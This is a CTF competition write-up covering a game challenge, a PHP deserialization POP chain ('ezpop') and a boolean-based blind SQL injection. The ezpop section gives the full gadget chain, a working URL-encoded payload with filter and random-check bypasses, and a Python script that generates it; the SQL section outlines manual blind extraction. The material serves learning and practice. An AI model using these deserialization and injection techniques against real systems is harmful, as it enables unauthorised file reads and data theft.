First time taking part in a formal team competition like this; being carried by the strong players is something I'd like to experience more often.
Final result
With the encouragement and help of a senior classmate, and despite a few regrets, we still got a result we're happy with.
Keep building up experience.


bombombom -- sign-in challenge

A game challenge, similar to the Bomberman game on 4399.
It was presumably meant to be solved by debugging the front-end JS; searched the scripts for the condition that reveals the flag, without result.
Just played through it by hand.

Turtle up and survive, done.


ezpop

PHP source is given; the challenge tests building a PHP deserialization POP chain and bypassing the restrictions.
Call chain:

Ctf::__destruct    -> $temp is a reference to $rand, so the strict comparison passes and preg_match() stringifies $file, which is a Happy object
Happy::__toString  -> reads $this->str->des; $str is a Game object that has no property named des, so __get fires
Game::__get        -> calls $this->name($name); $name is set to a method Game does not define, so __call fires
Game::__call       -> getflag($this->x), i.e. show_source() on the flag file stored in the private property $x

Three bypasses:

  1. MD5 check: the MD5 of 2023 happens to satisfy the condition
  2. PHP keyword filter: double-write ("pphphp" becomes "php" after one non-recursive str_replace)
  3. Random-number check: use a reference (R:n) so that $temp aliases $rand

robots.txt reveals the location of the flag: fllllllllllllllllllllllllllllag.php

Note: because the filter runs on the serialized input, the declared length (s:N) of the double-written string must be changed to the length it will have after the filter has stripped "php", otherwise unserialize() rejects it.

exp (the challenge classes, reproduced locally to generate the payload):

<?php
// Challenge classes, reproduced locally to generate the payload.
class Happy{
    public $str;
    public function getString(){
        return "maybe you can find something in somewhere";
    }
    // Runs when a Happy object is used as a string (here: by preg_match in Ctf::__destruct).
    // Reading ->des on $str (a Game object; des is a method there, not a property) fires Game::__get.
    public function __toString(){
        $a = $this->str->des;
        return "heihei";
    }
    function __destruct(){
        $this->str = "123";
    }
}
class Ctf{
    public $file="";
    public $rand;
    public $temp;
    public function getfile(){
        return "nothing";
    }
    // Entry point of the chain. $rand is generated fresh, so the only way to pass the
    // strict comparison is to make $temp a reference to $rand in the serialized data (R:6).
    // preg_match then stringifies $file, so $file is set to a Happy object.
    function __destruct(){
        $this->rand = rand(1,1000000);
        if($this->rand === $this->temp){
            if (preg_match("/php|flag/i", $this->file)) {
                die("hacker");
            }
        }
    }
}
class Game{
    public $name ;
    // Private property: serializes under the name "\0Game\0x" (7 bytes).
    // "pphphp" turns into "php" once filter() below has run.
    private $x="fllllllllllllllllllllllllllllag.pphphp";
    // __get calls $this->name($name); with $name set to a non-existent method this lands here.
    public function __call($name, $arguments) {
        $this->getflag($this->x);
    }
    function getflag($x){
        show_source($x);
    }
    public function des(){
        return "a class";
    }
    public function __get($name){
        return $this->name($name);
    }
}
// Strips "php" from the input in a single pass; str_replace is not recursive,
// which is what makes the double-write work.
function filter($str){
    return str_replace("php", "", "$str");
}

Running it locally produced the following payload:

?try_some_num=2023&pop=O%3A3%3A%22Ctf%22%3A3%3A%7Bs%3A4%3A%22file%22%3BO%3A5%3A%22Happy%22%3A1%3A%7Bs%3A3%3A%22str%22%3BO%3A4%3A%22Game%22%3A2%3A%7Bs%3A4%3A%22name%22%3Bs%3A3%3A%22hhh%22%3Bs%3A7%3A%22%00Game%00x%22%3Bs%3A35%3A%22fllllllllllllllllllllllllllllag.pphphp%22%3B%7D%7Ds%3A4%3A%22rand%22%3BN%3Bs%3A4%3A%22temp%22%3BR%3A6%3B%7D
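Added example, not code from the writeup: the same payload built by hand in Python instead of with PHP's serialize(), so that each bypass is visible in the bytes it produces: the private-property name encoding, the R:n reference that makes $temp alias $rand, and the "pphphp" double-write declared with its post-filter length. Class and property names come from the challenge source above; the one assumption is that the challenge runs filter() on the pop parameter before unserialize(), which is what the length note above implies.

```python
# Added example (not the writeup's code): build the ezpop payload by hand.
# Assumption: filter() runs on the pop parameter before unserialize().
from urllib.parse import quote

FILTER_WORD = "php"                                  # str_replace("php", "", $str)
FLAG_FILE = "fllllllllllllllllllllllllllllag.php"   # from robots.txt


def php_filter(s: str) -> str:
    # str.replace is one left-to-right, non-recursive pass, like PHP's str_replace.
    return s.replace(FILTER_WORD, "")


def double_write(word: str) -> str:
    # Nest the word inside itself so one removal pass leaves the word behind:
    # "php" -> "pphphp", and str_replace("php", "", "pphphp") == "php".
    # (Works for any word that is not a single repeated character.)
    return word[:1] + word + word[1:]


def php_string(value: str, declared_len=None) -> str:
    # s:<len>:"<value>";  declared_len states the length unserialize() will
    # actually see, i.e. the length *after* the filter has run.
    n = len(value) if declared_len is None else declared_len
    return f's:{n}:"{value}";'


def private_name(cls: str, prop: str) -> str:
    # private $x of class Game is stored under the 7-byte name "\0Game\0x".
    return f"\x00{cls}\x00{prop}"


def build_payload() -> str:
    # Game: name = any method Game does not define (so __get -> __call),
    # x = the flag file with the filtered word double-written.
    x_value = FLAG_FILE.replace(FILTER_WORD, double_write(FILTER_WORD))
    game = ('O:4:"Game":2:{'
            + php_string("name") + php_string("hhh")
            + php_string(private_name("Game", "x"))
            + php_string(x_value, declared_len=len(FLAG_FILE))
            + "}")
    happy = 'O:5:"Happy":1:{' + php_string("str") + game + "}"
    # R:n counts every value in order of appearance:
    # 1 Ctf, 2 Happy, 3 Game, 4 "hhh", 5 x's string, 6 rand (N) -> temp = R:6
    return ('O:3:"Ctf":3:{'
            + php_string("file") + happy
            + php_string("rand") + "N;"
            + php_string("temp") + "R:6;"
            + "}")


def string_lengths_consistent(serialized: str) -> bool:
    # Walk each s:N:"..."; token and check that N matches the bytes that
    # follow, which is the check unserialize() itself performs. Light scan,
    # sufficient for this payload (no string value contains 's:').
    i = 0
    while True:
        i = serialized.find("s:", i)
        if i < 0:
            return True
        j = serialized.index(":", i + 2)
        n = int(serialized[i + 2:j])
        if serialized[j + 1] != '"' or serialized[j + 2 + n:j + 4 + n] != '";':
            return False
        i = j + 4 + n


def encode_for_url(payload: str) -> str:
    # Percent-encode everything, including the NUL bytes of the private name.
    return quote(payload, safe="")


if __name__ == "__main__":
    raw = build_payload()
    print("lengths valid before filter:", string_lengths_consistent(raw))              # False
    print("lengths valid after filter: ", string_lengths_consistent(php_filter(raw)))  # True
    print("?try_some_num=2023&pop=" + encode_for_url(raw))
```

The raw payload deliberately fails the length check, because s:35 is declared for a 38-byte value; only after the server-side filter removes "php" does it become a valid serialized string, which is exactly the adjustment the note above describes.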

ScoreQuery

From the challenge description this is SQL injection.
Manual testing showed the string is closed with a single quote and %23 works as the comment.
Fuzzing showed the following were filtered:

Ordinary boolean-based blind injection works; tried brute-forcing with a script and it didn't work,
so it had to be done by hand in Burp.


Found that the point at which the response length changes to 2485 (no echo) marks the ASCII value of the character at that position.
Brute-forced the table name, then the column, then the flag in turn.

Fed the dumped data to ChatGPT.